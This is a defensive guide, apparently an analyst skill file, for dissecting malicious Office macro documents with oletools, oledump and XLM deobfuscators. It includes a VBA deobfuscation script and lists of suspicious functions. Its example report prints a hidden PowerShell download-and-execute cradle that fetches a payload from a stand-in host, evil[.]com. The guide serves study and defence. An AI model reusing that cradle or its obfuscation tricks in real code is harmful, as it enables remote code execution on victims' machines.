Analyzing Macro Malware in Office Documents
When to Use
- A suspicious Office document (.doc, .docm, .xls, .xlsm, .ppt) has been flagged by email security
- Investigating phishing campaigns that deliver weaponized Office documents
- Extracting VBA macro code to identify the payload download URL and execution method
- Analyzing obfuscated VBA code to understand the full attack chain
- Determining if a document uses DDE, ActiveX, or remote template injection instead of macros
Do not use for analyzing non-macro Office threats (DDE, remote template injection); while this skill covers detection of these, specialized analysis may be needed.
Prerequisites
- Python 3.8+ with oletools installed (
pip install oletools) - oledump.py from Didier Stevens (https://blog.didierstevens.com/programs/oledump-py/)
- Isolated analysis VM without Microsoft Office installed (prevents accidental execution)
- XLMDeobfuscator for Excel 4.0 macro analysis (pip install xlmdeobfuscator)
- LibreOffice for safe document rendering (does not execute VBA macros by default)
Workflow
Step 1: Initial Document Triage
Determine if the document contains macros or other active content:
# Quick triage with olevba
olevba suspect.docm
# Check for OLE streams and macros
oleid suspect.docm
# Output indicators:
# VBA Macros: True/False
# XLM Macros: True/False
# External Relationships: True/False (remote template)
# ObjectPool: True/False (embedded objects)
# Flash: True/False (SWF objects)
# Comprehensive OLE analysis
oledump.py suspect.docm
# List all OLE streams with macro indicators
# Streams marked with 'M' contain VBA macros
# Streams marked with 'm' contain macro attributes
Step 2: Extract and Analyze VBA Code
Pull out the complete VBA macro source:
# Extract VBA with full deobfuscation
olevba --decode --deobf suspect.docm
# Extract just the VBA source code
olevba --code suspect.docm > extracted_vba.txt
# Detailed extraction with oledump
oledump.py -s 8 -v suspect.docm # Stream 8 (adjust based on stream listing)
# Extract all macro streams
oledump.py -p plugin_vba_dco suspect.docm
Key VBA Elements to Identify:
━━━━━━━━━━━━━━━━━━━━━━━━━━━
Auto-Execution Triggers:
- Auto_Open / AutoOpen (Word)
- Auto_Close / AutoClose
- Document_Open / Document_Close
- Workbook_Open (Excel)
- AutoExec
Suspicious Functions:
- Shell() / Shell.Application
- WScript.Shell.Run / Exec
- CreateObject("WScript.Shell")
- PowerShell execution
- URLDownloadToFile
- MSXML2.XMLHTTP (HTTP requests)
- ADODB.Stream (file writing)
- Environ() (environment variables)
- CallByName (indirect method calls)
Step 3: Deobfuscate VBA Code
Remove obfuscation layers to reveal the payload:
# VBA deobfuscation techniques
import re
def deobfuscate_vba(code):
# 1. Resolve Chr() calls: Chr(104) & Chr(116) -> "ht"
def resolve_chr(match):
try:
return chr(int(match.group(1)))
except:
return match.group(0)
code = re.sub(r'Chr\$?\((\d+)\)', resolve_chr, code)
# 2. Remove string concatenation: "htt" & "p://" -> "http://"
code = re.sub(r'"\s*&\s*"', '', code)
# 3. Resolve ChrW calls: ChrW(104)
code = re.sub(r'ChrW\$?\((\d+)\)', resolve_chr, code)
# 4. Resolve StrReverse: StrReverse("exe.daolnwod") -> "download.exe"
def resolve_reverse(match):
return '"' + match.group(1)[::-1] + '"'
code = re.sub(r'StrReverse\("([^"]+)"\)', resolve_reverse, code)
# 5. Remove Mid$/Left$/Right$ obfuscation (complex, mark for manual review)
# 6. Resolve Replace(): Replace("Powxershxell", "x", "")
def resolve_replace(match):
original = match.group(1)
find = match.group(2)
replace_with = match.group(3)
return '"' + original.replace(find, replace_with) + '"'
code = re.sub(r'Replace\("([^"]+)",\s*"([^"]+)",\s*"([^"]*)"\)', resolve_replace, code)
return code
with open("extracted_vba.txt") as f:
vba_code = f.read()
deobfuscated = deobfuscate_vba(vba_code)
print(deobfuscated)
Step 4: Analyze Excel 4.0 (XLM) Macros
Handle legacy Excel macros that bypass VBA detection:
# Detect XLM macros
olevba --xlm suspect.xlsm
# Deobfuscate XLM macros
xlmdeobfuscator -f suspect.xlsm
# Manual XLM analysis with oledump
oledump.py suspect.xlsm -p plugin_biff.py
# XLM (Excel 4.0) macro functions to watch for:
# EXEC() - Execute shell command
# CALL() - Call DLL function
# REGISTER() - Register DLL function
# URLDownloadToFileA - Download file
# ALERT() - Display message (social engineering)
# HALT() - Stop execution
# GOTO() - Control flow
# IF() - Conditional execution
Step 5: Check for Non-Macro Attack Vectors
Examine the document for DDE, remote templates, and embedded objects:
# Check for DDE (Dynamic Data Exchange)
python3 -c "
import zipfile
import xml.etree.ElementTree as ET
import re
z = zipfile.ZipFile('suspect.docx')
for name in z.namelist():
if name.endswith('.xml') or name.endswith('.rels'):
content = z.read(name).decode('utf-8', errors='ignore')
# DDE field codes
if 'DDEAUTO' in content or 'DDE ' in content:
print(f'[!] DDE found in {name}')
dde_match = re.findall(r'DDEAUTO[^\"]*\"([^\"]+)\"', content)
for m in dde_match:
print(f' Command: {m}')
# Remote template
if 'attachedTemplate' in content or 'Target=' in content:
urls = re.findall(r'Target=\"(https?://[^\"]+)\"', content)
for url in urls:
print(f'[!] Remote template URL: {url}')
"
# Check for embedded OLE objects
oledump.py -p plugin_msg.py suspect.docm
# Check relationships for external references
python3 -c "
import zipfile
z = zipfile.ZipFile('suspect.docx')
for name in z.namelist():
if '.rels' in name:
content = z.read(name).decode('utf-8', errors='ignore')
if 'http' in content.lower() or 'ftp' in content.lower():
print(f'External reference in {name}:')
import re
urls = re.findall(r'Target=\"([^\"]+)\"', content)
for url in urls:
print(f' {url}')
"
Step 6: Generate Analysis Report
Document the complete macro malware analysis:
Report should include:
- Document metadata (author, creation date, modification date)
- Macro presence and type (VBA, XLM, DDE, remote template)
- Auto-execution trigger identified
- Deobfuscated VBA source code (key functions)
- Download URL(s) for second-stage payloads
- Execution method (Shell, WScript, PowerShell, COM object)
- Social engineering lure description
- Extracted IOCs (URLs, domains, IPs, file hashes)
- YARA rule for the specific document pattern
Key Concepts
| Term | Definition |
|---|---|
| VBA Macro | Visual Basic for Applications code embedded in Office documents that can interact with the OS, download files, and execute commands |
| Auto_Open | VBA event procedure that executes automatically when a Word document is opened, the primary trigger for macro malware |
| OLE (Object Linking and Embedding) | Microsoft compound document format; Office documents are OLE containers with streams that can contain macros and objects |
| DDE (Dynamic Data Exchange) | Legacy Windows IPC mechanism abused in documents to execute commands without macros; triggered by field code updates |
| Remote Template Injection | Attack loading a macro-enabled template from a remote URL when the document opens, bypassing initial macro detection |
| XLM Macros (Excel 4.0) | Legacy Excel macro language predating VBA; stored in hidden sheets and often missed by traditional VBA analysis tools |
| Protected View | Office sandbox that prevents macro execution until the user clicks "Enable Content"; social engineering targets this barrier |
Tools & Systems
- oletools (olevba): Python toolkit for analyzing OLE files, extracting VBA macros, and detecting suspicious keywords and IOCs
- oledump.py: Didier Stevens' tool for analyzing OLE streams with plugin support for VBA decompression and extraction
- XLMDeobfuscator: Tool specifically designed for deobfuscating Excel 4.0 (XLM) macro formulas
- ViperMonkey: VBA emulation engine that executes VBA macros in a sandboxed environment to observe behavior
- YARA: Pattern matching for document-based malware detection using VBA string patterns and OLE structure indicators
Common Scenarios
Scenario: Analyzing a Phishing Document with Obfuscated VBA Macros
Context: Multiple employees received an email with an attached .docm file claiming to be an invoice. The document prompts users to "Enable Content" to view the full document.
Approach:
- Run oleid to confirm VBA macros are present and identify auto-execution triggers
- Extract VBA code with olevba --decode --deobf for initial deobfuscation
- Identify the auto-execution entry point (Auto_Open or Document_Open)
- Trace the execution flow from the entry point through helper functions
- Deobfuscate string concatenation and Chr() encoding to reveal the download URL
- Identify the download method (WScript.Shell, MSXML2.XMLHTTP, PowerShell)
- Extract all IOCs and create YARA rules for the specific obfuscation pattern
Pitfalls:
- Opening the document in Microsoft Office for "quick analysis" instead of using command-line tools
- Missing VBA code stored in UserForms (GUI elements can contain code in their event handlers)
- Ignoring document metadata that may contain attacker fingerprints (author name, template name)
- Not checking for both VBA and XLM macros in the same document (some malware uses both)
Output Format
OFFICE MACRO MALWARE ANALYSIS
================================
Document: invoice_q3_2025.docm
SHA-256: e3b0c44298fc1c149afbf4c8996fb924...
File Type: Microsoft Word Document (OOXML with macros)
Author: Administrator
Creation Date: 2025-09-10 14:23:00
MACRO ANALYSIS
Type: VBA Macro
Trigger: AutoOpen()
Streams: 3 VBA streams (ThisDocument, Module1, Module2)
DEOBFUSCATED EXECUTION CHAIN
1. AutoOpen() -> Calls Module1.RunPayload()
2. RunPayload() builds command string via Chr() concatenation
3. Command: powershell -nop -w hidden -enc JABjAGwAaQBlAG4AdAA...
4. Decoded: IEX (New-Object Net.WebClient).DownloadString('hxxp://evil[.]com/payload.ps1')
SOCIAL ENGINEERING LURE
- Document displays fake "Protected Document" image
- Instructs user to "Enable Content" to view the document
- Content is blurred/hidden until macros execute
EXTRACTED IOCs
Download URL: hxxp://evil[.]com/payload.ps1
C2 Domain: evil[.]com
IP Address: 185.220.101[.]42
User-Agent: PowerShell (default WebClient)
MITRE ATT&CK
T1566.001 Phishing: Spearphishing Attachment
T1204.002 User Execution: Malicious File
T1059.001 Command and Scripting Interpreter: PowerShell
T1059.005 Command and Scripting Interpreter: Visual Basic